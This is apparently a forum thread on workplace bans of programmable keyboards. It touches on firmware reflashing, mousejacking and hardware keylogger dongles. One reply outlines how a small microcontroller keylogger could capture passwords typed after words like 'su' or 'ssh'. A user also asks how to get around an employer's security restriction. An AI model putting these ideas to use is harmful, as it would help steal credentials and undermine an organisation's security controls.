obvious enough that this has gone so far as to result in a complete ban of keyboards with custom controllers (among other peripherals) and the creation of an 'approved peripherals' list at my workplace.
whether or not it's stupid, whether or not it's something that needs to be worried about, it's something that IS being worried about by my infosec team. any keyboard with good macro support (not just custom ones) carries more risk than the standard dumb commercial board.
Does it, really?
First, commercial keyboards usually have flashable firmware too... I know Logitech have. I haven't looked into the possibility of putting an hacked firmware in a commercial keyboard, but should I be a spy, I think I'd spent some time in this. There's far more target that could be hacked because of a common commercial keyboard than because of an Ergodox...
Beside, I hope your infosec banned all wireless devices? Because if you want a common weakness, commercial wireless keyboards and mouses are really common way to hack someone.
Se for example Mousejacking:
A 15$ antenna, and you can hack a lot of people in a 100-200m radius that use a wireless radio mouse...
^^ this is the type of information I'm looking for. comments and suggestions on how i can make a custom keyboard that beats the restriction of "it can't be re-programmable"
Well, commercial keyboards are re-programmable
If your infosec people are worried about a villain reflashing a keyboard with malware, these things will give them nightmares.
That's actually a real threat...
I used one of those to demonstrate my school how their practices were dangerous. They asked teachers to log in in the classroom to enter people that weren't there. Problem, even if there's a "in-classroom" mode with limited access, it's the same password. And the password protect everything, including marks and result in exams.
Worse, computers are enclosed in desks, and it's a nightmare to check whether there's a dongle between the keyboard and the computer. In a couple of minutes, a student can install it, but you can't spent 5 minutes moving the PC each time you log in to check if there's no dongle.
Anyway, what would be the malicious function of a keyboard controller? A keylogger? I doubt it, if the controller is an ordinary Teensy or Pro Micro, because the on-board memory is tiny.
It's sufficient, though...
Just record the 20-30 characters that follow a couple of words (like su, ssh, root, admin or a set of logins) and even with a couple hundred bytes of memory, you should be able to get passwords.
Maybe I'm paranoid, but each time I use a password on a public computer (internet-cafes, for example), I open a notepad alongside the browser, and I use mouse between each keystroke. So that the characters are entered in the wrong order on the keyboard, some are put in the notepad, some in the browser.
So they may now that my password is 15 characters among 30, in a different order. Good luck to anyone using keyloggers. It's a hassle, but it makes me feels better